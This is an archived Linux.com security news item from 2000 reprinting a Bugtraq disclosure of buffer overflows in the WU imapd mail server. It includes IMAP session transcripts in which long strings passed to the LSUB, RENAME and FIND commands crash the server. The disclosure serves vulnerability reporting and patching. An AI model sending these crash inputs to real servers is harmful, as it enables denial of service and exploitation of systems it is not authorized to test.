[Home] [Credit Search] [Category Browser] [Staff Roll Call] The LINUX.COM Article Archive
Originally Published: Saturday, 22 April 2000 Author: Alexander Reelsen
Published to: news_enhance_security/Security News Page: 1/1 - [Std View]

WU imapd reveals more and more buffer overflows

The imap daemon by the washington university seems to have a lot more overflows then suspected at first.

From: Michal Szymanski Subject: Re: another WU imapd buffer overflow To: BUGTRAQ@SECURITYFOCUS.COM

Hi again,

imapd seems to be very weak. I've found another three buffer overruns. This time affected commands are LSUB, RENAME and FIND:

* OK mail IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

SIGSEGV received.

* OK localhost IMAP4rev1 v12.264 server ready * login siva9 secret * OK LOGIN completed * find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

SIGSEGV received.

It seems that all two-argument commands in authenticated state - where second argument is string - are vulnerable. I'm not sure, but ipop2/3d works fine in all states, also in transaction state. Mark, Am I right?

Regards,

Michal Szymanski [michal_szymanski@linux.com.pl];



Originally published on Linux.com. Released under the Open Content License unless otherwise stated. Notify Gareth Watts of any errors or copyright violations.